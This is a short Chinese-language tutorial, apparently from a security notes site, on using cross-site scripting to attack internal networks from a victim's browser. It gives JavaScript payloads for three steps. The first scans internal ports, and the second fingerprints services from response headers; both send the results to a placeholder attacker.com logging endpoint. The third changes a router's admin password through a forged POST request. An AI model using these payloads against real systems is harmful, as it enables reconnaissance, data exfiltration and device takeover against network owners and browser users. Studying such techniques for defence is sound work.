2-4 XSS 怎么打内网
约 611 字大约 2 分钟
2025-11-02
XSS 怎么打内网
1. 端口扫描
这是最基础也最常见的利用方式。攻击者可以通过 JavaScript 构造请求(如 <img> 或 <iframe> 标签),尝试加载内网 IP 地址和端口,并根据加载成功或失败来判断端口是否开放
基本思路:
加载
<img>标签:<img>标签的src属性可以指向内网 IP 和端口。如果图片能够加载成功,就说明该端口是开放的。可以通过onerror和onload事件来判断加载结果示例代码:
const targetIp = '192.168.1.1'; const targetPorts = [80, 22, 445, 8080]; targetPorts.forEach(port => { const img = new Image(); img.onload = () => { // 端口开放 console.log(`Port ${port} on ${targetIp} is open.`); // 将结果发送回攻击者服务器 fetch(`http://attacker.com/log?ip=${targetIp}&port=${port}&status=open`); }; img.onerror = () => { // 端口关闭或无法访问 console.log(`Port ${port} on ${targetIp} is closed.`); }; img.src = `http://${targetIp}:${port}`; });加载
<iframe>标签:<iframe>标签可以用来加载内网页面。如果加载成功,攻击者可以通过 JavaScript 获取页面的部分内容(但受同源策略限制)
2. 服务指纹识别
通过上一步的端口扫描,攻击者可以确定内网中有哪些服务是开放的。接下来,可以通过 JavaScript 发送 AJAX 请求到这些服务,然后根据响应头(如 Server、X-Powered-By)或页面内容来识别服务的类型和版本
示例代码:
const targetUrl = 'http://192.168.1.1:8080';
fetch(targetUrl)
.then(response => {
// 检查响应头,获取服务信息
const serverHeader = response.headers.get('Server');
console.log(`Server on ${targetUrl} is: ${serverHeader}`);
// 将结果发送回攻击者服务器
fetch(`http://attacker.com/log?url=${targetUrl}&server=${serverHeader}`);
})
.catch(error => {
console.error(`Could not connect to ${targetUrl}`);
});3. 攻击内网路由器或管理后台
许多内网路由器和管理系统都存在默认密码或已知漏洞。攻击者可以利用 XSS 漏洞,在受害者浏览器中构造并发送针对这些设备的请求
示例:利用 CSRF 漏洞修改路由器密码
假设某个路由器修改密码的请求是:POST /admin/password_change,并带上参数 new_password=123456。 攻击者可以通过 JavaScript 构造一个表单并提交,或者直接用 fetch 发送请求
示例代码:
// 假设路由器IP是 192.168.1.1,并且修改密码的路径是 /admin/change_password
const routerIp = '192.168.1.1';
const newPassword = 'hacked_by_xss';
const formData = new FormData();
formData.append('password', newPassword);
fetch(`http://${routerIp}/admin/change_password`, {
method: 'POST',
body: formData
}).then(() => {
console.log('Router password changed!');
});